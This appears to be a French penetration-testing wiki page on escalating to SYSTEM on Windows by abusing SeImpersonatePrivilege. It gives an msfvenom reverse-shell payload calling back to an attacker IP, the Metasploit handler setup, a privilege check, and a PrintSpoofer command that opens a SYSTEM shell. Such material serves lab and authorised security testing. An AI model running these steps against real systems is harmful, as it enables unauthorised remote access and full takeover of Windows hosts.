🎩SeImpersonatePrivilege

Abus des privilèges d'emprunt d'identité sur Windows 10 et Server 2019

Exploitation

Prérequis: La cible doit être vulnérable à une faille de type file upload pour pouvoir être exploité.

Maintenant que nous avons testé que nous pouvions télécharger un shell et exécuter des commandes, il est temps d'exploiter le système et d'obtenir un meterpreter sur la machine cible. Cela signifie que nous devrons créer une charge utile à l'aide de msfvenom ou de tout autre outil de votre choix. Nous nommons notre charge utile shell.exe.

$ msfvenom -p windows/meterpreter/reverse_tcp lhost=<attacker IP> lport=<port d'écoutee> -f exe > shell.exe

Il nous faut également préparer un multi handler sur notre machine pour recevoir la connexion.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT <port d'écoute>
exploit

La prochaine étape est d'uploader le reverse shell dans le server cible et de l'exécuter.

Une fois que le shell est bien reçu dans le multi handler, bien que vous n'ayez pas besoin de vous fier à la commande getprivs du shell Metepreter. Vous pouvez vérifier que le privilège activé peut être vérifié à l'aide de la commande whoami avec l'option /priv.

meterpreter> whoami /priv

On doit donc retrouver dans la réponse

SeImpersonatePrivilege en "Enabled" et le nom de l'utilisateur auquel on est connecté.

Elevation de privilège

Pour abuser de cette fonctionnalité on peut utiliser l'exécutable PrintSpoofer.exe.

C:\users\public>PrintSpoofer.exe -i -c cmd

Si tout se passe bien, cela devrait ouvrir un cmd avec les droits NT AUTHORITY\SYSTEM.

Dernière mise à jour